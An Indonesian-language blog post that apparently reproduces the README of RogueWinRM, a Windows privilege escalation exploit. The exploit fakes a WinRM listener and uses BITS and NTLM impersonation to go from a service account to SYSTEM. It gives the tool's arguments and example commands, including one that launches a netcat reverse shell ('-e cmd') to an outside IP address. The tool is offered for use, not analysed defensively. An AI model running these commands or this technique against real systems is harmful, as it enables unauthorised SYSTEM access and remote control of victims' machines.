Breaking

Saturday, January 9, 2021

RogueWinRM - Eskalasi Hak Istimewa Lokal Windows Dari Akun Layanan Ke Sistem

 Kang IT

RogueWinRM - Eskalasi Hak Istimewa Lokal Windows Dari Akun Layanan Ke Sistem



RogueWinRM adalah eksploitasi eskalasi hak istimewa lokal yang memungkinkan untuk eskalasi dari akun Layanan (dengan SeImpersonatePrivilege) ke akun Sistem Lokal jika layanan WinRM tidak berjalan ( default pada Win10 tetapi TIDAK pada Windows Server 2019 ).




Secara singkat, ia akan mendengarkan koneksi masuk pada port 5985 yang memalsukan layanan WinRM yang sebenarnya.
Ini hanya server web minimal yang akan mencoba menegosiasikan otentikasi NTLM dengan layanan apa pun yang mencoba menyambung di port itu.
Kemudian layanan BITS (berjalan sebagai Sistem Lokal) dipicu dan itu akan mencoba untuk mengotentikasi ke pendengar nakal kami. Setelah diautentikasi ke pendengar nakal kami, kami dapat meniru pengguna Sistem Lokal yang memicu proses sewenang-wenang dengan hak istimewa tersebut.

Anda dapat menemukan deskripsi teknis lengkap tentang kerentanan ini di tautan ini -> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/


Pemakaian

RogueWinRM

Mandatory args:
-p <program>: program to launch

Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output


Contoh


 

Menjalankan cmd interaktif:

RogueWinRM.exe -p C:\windows\system32\cmd.exe

Menjalankan netcat reverse shell:

RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"


Penulis





Regatds

Kang IT

No comments:

Post a Comment